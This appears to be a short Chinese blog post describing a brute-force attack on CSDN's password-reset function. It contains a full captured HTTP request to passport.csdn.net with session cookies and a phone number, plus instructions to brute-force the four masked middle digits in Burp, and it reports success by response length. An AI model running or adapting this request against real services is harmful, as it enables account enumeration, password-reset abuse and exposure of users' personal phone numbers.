1.用户名找回密码处抓包,只有中间四位数不显示,直接burp

POST /v1/fpwd/sendVerifyCode HTTP/1.1
Host: passport.csdn.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://passport.csdn.net/forget
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
X-Tingyun-Id: im-pGljNfnc;r=490416751
Content-Length: 60
Origin: https://passport.csdn.net
Connection: close
Cookie: uuid_tt_dd=10_19718623100-1600489467663-468396; dc_session_id=10_1600489467663.115620; TY_SESSION_ID=8b3e3cde-a6a1-4565-a6aa-5342597656a4; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1600489471; Hm_lpvt_6bcd52f51e9b3dce32bec4a3997715ac=1600490219; Hm_up_6bcd52f51e9b3dce32bec4a3997715ac=%7B%22islogin%22%3A%7B%22value%22%3A%220%22%2C%22scope%22%3A1%7D%2C%22isonline%22%3A%7B%22value%22%3A%220%22%2C%22scope%22%3A1%7D%2C%22isvip%22%3A%7B%22value%22%3A%220%22%2C%22scope%22%3A1%7D%7D; Hm_ct_6bcd52f51e9b3dce32bec4a3997715ac=6525*1*10_19718623100-1600489467663-468396; dc_sid=8ec81fe07d5451c2ada34fc52b5757a3; announcement=%257B%2522isLogin%2522%253Afalse%252C%2522announcementUrl%2522%253A%2522https%253A%252F%252Flive.csdn.net%252Froom%252Fyzkskaka%252F5n5O4pRs%253Futm_source%253D1598583200%2522%252C%2522announcementCount%2522%253A0%252C%2522announcementExpire%2522%253A3600000%257D; SESSION=92d742f5-2deb-4574-8e44-bb73c5b869d9; c_first_ref=default; c_first_page=https%3A//passport.csdn.net/login%3Fcode%3Dpublic; c_page_id=https%3A//passport.csdn.net/login; dc_tos=qgw257

{"sendType":"1","code":"0086","mobileOrEmail":"15100009506"}

截图如下,直接爆破

字节330爆破成功

大概就这些吧……看不懂别看……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...